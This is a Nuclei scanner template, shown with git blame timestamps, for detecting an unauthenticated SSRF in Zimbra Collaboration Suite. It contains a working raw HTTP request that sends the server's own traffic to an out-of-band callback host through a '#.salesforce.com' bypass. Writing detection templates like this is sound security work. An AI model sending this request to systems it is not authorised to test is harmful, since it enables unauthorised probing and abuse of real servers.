nuclei-templates/vulnerabilities/other/zimbra-preauth-ssrf.yaml

24 lines
730 B
YAML
Raw Normal View History

2021-08-03 07:22:56 +00:00
id: zimbra-preauth-ssrf
info:
name: Zimbra Collaboration Suite (ZCS) - SSRF
author: gy741
severity: critical
2021-10-26 12:23:43 +00:00
description: A vulnerability in Zimbra Collaboration Suite allows remote unauthenticated attackers to cause the product to include content returned by third-party servers and use it as its own code.
reference:
2021-08-03 07:22:56 +00:00
- https://www.adminxe.com/2183.html
2021-10-18 20:40:26 +00:00
tags: zimbra,ssrf,oast
2021-08-03 07:22:56 +00:00
requests:
- raw:
- |
GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://{{interactsh-url}}%23.salesforce.com/ HTTP/1.1
Host: {{Hostname}}
Accept: */*
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"